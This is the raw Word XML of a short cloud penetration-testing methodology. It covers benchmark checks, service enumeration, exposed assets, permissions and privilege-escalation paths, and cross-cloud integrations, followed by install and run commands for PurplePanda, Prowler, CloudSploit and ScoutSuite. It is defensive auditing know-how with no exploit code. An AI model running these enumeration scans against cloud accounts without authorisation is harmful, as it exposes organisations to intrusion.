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FDE8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u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3157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u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3157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u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloud Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E2334E" w14:textId="77777777" w:rsidR="00240D72" w:rsidRDefault="00240D72"/>
    <w:p w14:paraId="76135756" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="061D79D3" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F315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Basic Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D7519F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Each cloud has its own peculiarities but in general there are a few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common things a </w:t>
      </w:r>
      <w:proofErr w:type="spell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pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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should check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> when testing a cloud environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6663080D" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Benchmark checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0038B9A0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will help you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understand the size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the environment and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services </w:t>
      </w:r>
      <w:proofErr w:type="gram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used</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B35D14B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will allow you also to find some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quick misconfigurations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> as you can perform most of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>this tests</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with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automated tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAAFD7D" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Services Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCBAB6F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probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C8116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will allow you to know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what is exactly being used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the cloud </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F7118EF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will help a lot in the next </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40D6710D" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Check exposed </w:t>
      </w:r>
      <w:proofErr w:type="gram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assets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DBBCC98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can be done during the previous </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>section,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you need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find out everything that is potentially exposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the Internet somehow and how can it be accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4F15C" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Here I'm taking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manually exposed infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> like instances with web pages or other ports being exposed, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> about other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cloud managed services that can be configured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be exposed (such as DBs or buckets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC1FED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Then you should check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if that resource can be exposed or not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (confidential information? vulnerabilities? misconfigurations in the exposed service?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1A834" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Check </w:t>
      </w:r>
      <w:proofErr w:type="gram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permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48CEBC51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Here you should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find out all the permissions of each role/user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the cloud and how are they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>used</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E1B38B5" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Too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many highly privileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (control everything) accounts? Generated keys not used?... Most of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>these check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> should have been done in the benchmark tests already</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B43F5" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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the client is using OpenID or SAML or other </w:t>
      </w:r>
      <w:proofErr w:type="gram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federation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you might need to ask them for further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information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lastRenderedPageBreak/>
        <w:t xml:space="preserve">about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how is being each role assigned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (it's not the same that the admin role is assigned to 1 user or to 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094ADD6E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It's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not enough to find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> which users has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admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>*:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">". There are a lot of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other permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that depending on the services used can be very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sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D8D1F" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Moreover, there are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potential </w:t>
      </w:r>
      <w:proofErr w:type="spell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privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> ways to follow abusing permissions. All </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>this things</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be taken into account and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as much </w:t>
      </w:r>
      <w:proofErr w:type="spell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privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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paths as possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be reported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB8EAA" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Check Integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CF6A2" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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It's highly probably that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integrations with other clouds or SaaS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> are being used inside the cloud env.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E8DC0" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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For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integrations of the </w:t>
      </w:r>
      <w:proofErr w:type="gram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cloud</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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you are auditing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with other platform you should notify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who has access to (ab)use that integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you should ask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how sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the action being performed. For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>is the action in GCP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> treating that data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1740E3FB" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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For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integrations inside the </w:t>
      </w:r>
      <w:proofErr w:type="gram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cloud</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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you are auditing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> from external platforms, you should ask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who has access externally to (ab)use that integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check how is that data being used. For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F76D6DF" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F315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Multi-Cloud tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DF5CF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 are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C0D60" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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hyperlink r:id="rId7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PurplePanda</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2949C310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 tool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identify bad configurations and </w:t>
      </w:r>
      <w:proofErr w:type="spell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privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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path in clouds and across clouds/SaaS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055AE8D9" w14:textId="1D64DE68" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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br/>
        <w:t>Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA36F61" w14:textId="77777777" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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17F4859A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You need to install and run neo4j also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6229D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git clone https://github.com/carlospolop/PurplePanda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585AA751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cd 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PurplePanda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28D1B6CD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 xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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venv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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="105EB14A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source bin/</w:t>
      </w:r>
      <w:proofErr w:type="gram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activate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BC41D0E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python3 -m pip install -r </w:t>
      </w:r>
      <w:proofErr w:type="gram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requirements.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D9B6C44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export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E953FCC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export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBD5FCF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python3 main.py -h # Get </w:t>
      </w:r>
      <w:proofErr w:type="gram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help</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E4EA7DC" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="159B22C1" w14:textId="3C013524" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F31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31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GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAEBC8" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="75CCD48C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export GOOGLE_DISCOVERY=$(echo 'google:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02F505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-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file_path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: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627EABE3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09512F6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-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file_path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: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620525A1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service_account_id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: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A818F84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76BA8B9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python3 main.py -a -p google #Get basic info of the account to check it's correctly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configured</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58349F17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python3 main.py -e -p google #Enumerate the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env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30188310" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="7A436C5E" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="3EF3C69A" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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hyperlink r:id="rId8" w:history="1"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Prowler</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2916E587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supports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AWS, GCP &amp; Azure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. Check how to configure each provider in </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:anchor="aws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https://docs.prowler.cloud/en/latest/#aws</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E702EE0" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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60C3487A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Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC048F6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pip install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prowler</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="71BBDAA2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prowler -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF6DD0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0E4B33C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Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BCC324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prowler &lt;provider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6496F459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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E28E3FC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prowler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aws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--profile custom-profile [-M csv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json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json-asff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html]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BEFDD5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71CB291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Get info about checks &amp; services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB2485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prowler &lt;provider&gt; --list-checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4AC80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prowler &lt;provider&gt; --list-services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A8E73" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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hyperlink r:id="rId10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CloudSploit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C47DDD2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AWS, Azure,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>, Google, Oracle, Alibaba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4941D3" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="5AA65C54" w14:textId="73B5782F" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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br/>
        <w:t>Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470621AD" w14:textId="77777777" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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3B30DC5B" w14:textId="77777777" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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5C8260BB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Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C5BF54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git clone https://github.com/aquasecurity/cloudsploit.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49A162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cd 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cloudsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CC0D1FD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npm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install</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C44C940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./index.js -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E97D22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## Docker instructions in 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github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CFF4E73" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="23A59EE9" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="36DC0D3F" w14:textId="32F4FA10" w:rsidR="006F3157" w:rsidRDefault="006F3157">
      <w:pP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GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41414613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You need to have creds for a service account and set them in config.js file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A2517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./index.js --cloud google --config &lt;/abs/path/to/config.js&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B93413" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="6E7AB791" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="32238E67" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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hyperlink r:id="rId11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ScoutSuite</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="191AE135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AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0296D3" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="7FF9EA23" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31983BE6" w14:textId="77777777" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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7AA18F66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mkdir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scout; cd scout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2307384A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virtualenv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-p python3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venv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="670728A7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source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venv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/bin/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activate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18AF6A3C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pip install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scoutsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C8B31ED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scout --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2307186E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Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA7B82" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157"/>
    <w:p w14:paraId="1360ECFE" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157"/>
    <w:p w14:paraId="087079AF" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157">
      <w:pP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GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203EFC9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scout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--report-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dir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tmp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--user-account --all-projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12ED94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use "--service-account KEY_FILE" instead of "--user-account" to use a service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D310E79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E050B46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SCOUT_FOLDER_REPORT="/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tmp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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E7C09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for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in $(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projects list --format="value(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projectId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)"); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3925A2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echo "================================================"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6592D0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echo "Checking $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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE2308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mkdir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"$SCOUT_FOLDER_REPORT/$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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E52D236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scout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--report-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dir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"$SCOUT_FOLDER_REPORT/$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 --no-browser --user-account --project-id "$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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A570F1A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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC57E69" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157">
      <w:pP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58772AC" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157">
